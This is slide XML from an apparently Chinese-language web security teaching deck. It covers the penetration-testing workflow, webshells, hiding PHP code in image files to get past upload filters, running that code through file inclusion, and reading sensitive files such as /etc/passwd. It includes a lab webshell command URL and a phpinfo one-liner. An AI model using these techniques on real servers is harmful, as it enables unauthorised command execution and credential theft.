              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数中传递要执行的系统指令：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://localhost/hackable/uploads/wc.php?a=whoami</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D933BDAE-3643-4AE9-8F8C-BBEEA96BCD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="26898" r="25917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5739319" y="144044"/>
            <a:ext cx="6452681" cy="6713956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15531268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5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584854" y="742260"/>
            <a:ext cx="11607146" cy="6001643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>明确目标</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目标：确定测试目标的范围，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，域名，内外网等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>需求：确定任务需求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>需要达到什么程度的渗透。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法：扫描与搜索。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>漏洞探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>根据收集得到的各种信息对目标进行相应漏洞的扫描。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>漏洞验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>将漏洞探测中发现的有可能可以成功利用的全部漏洞都验证一遍。结合实际情况，搭建模拟环境进行试验。成功后再应用于目标中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>信息分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>分析目标系统、防火墙、网络环境等信息，为下一步精确实施渗透准备。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>获取所需</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>根据之前的准备对目标实施攻击，获取敏感信息、管理员权限等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>7.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>信息整理，形成报告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>根据上诉步骤的执行情况形成最终渗透测试报告。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13333652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webshell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="11169929" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就是以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后门文件与网站服务器目录下正常的网页文件混在一起，然后就可以使用浏览器来访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后门，得到一个命令执行环境，以达到控制网站服务器的目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>顾名思义，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的含义是显然需要服务器开放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>shell”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的含义是取得对服务器某种程度上操作权限。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{009192EC-4891-4645-A6FD-17AD7334A278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2538919" y="739030"/>
            <a:ext cx="9653081" cy="6118970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3958990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隐写</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="11169929" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>当使用文件上传漏洞时服务器会对用户上传的文件进行一定过滤，防止用户上传恶意脚本文件。例如检测用户上传文件的后缀名，当提示用户上传头像时就只允许用户上传后缀如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等图片文件。除了后缀名，有时候服务器甚至会对文件内容进行判断，只有符合图像文件二进制格式的文件才能上传成功。于是为了成功上传可执行的脚本文件，可以将可执行代码附加在正常的图片文件中以逃避检测，成为文件隐写。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25527125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隐写</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392016" y="1313380"/>
            <a:ext cx="11169929" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一句话木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(); ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>隐写在图片文件中：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E4EDF38-D9E5-4F84-8707-BB3B4B426E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="712236" y="1961125"/>
            <a:ext cx="10767528" cy="4896875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356861673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隐写</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392016" y="1313380"/>
            <a:ext cx="11169929" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上传成功后使用文件包含漏洞执行隐写在图片文件中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A489AA0F-F6AC-4D28-8F31-D6F3337B67A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1558081" y="1873672"/>
            <a:ext cx="9228105" cy="4984328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15780796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敏感文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337592" y="2271401"/>
            <a:ext cx="3638940" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统中用户及密码文件，虽然密码使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>存储，但依然可以通过彩虹表爆破。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC11E3A-8B31-4760-A74A-29DAB3339588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4170784" y="606955"/>
            <a:ext cx="8021216" cy="6251045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194434642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敏感文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337592" y="2271401"/>
            <a:ext cx="3638940" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>●	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>记录组和组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDE76A24-161D-46EA-AB98-2844CD1823AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="50708"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4665995" y="1530777"/>
            <a:ext cx="6554811" cy="4073676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
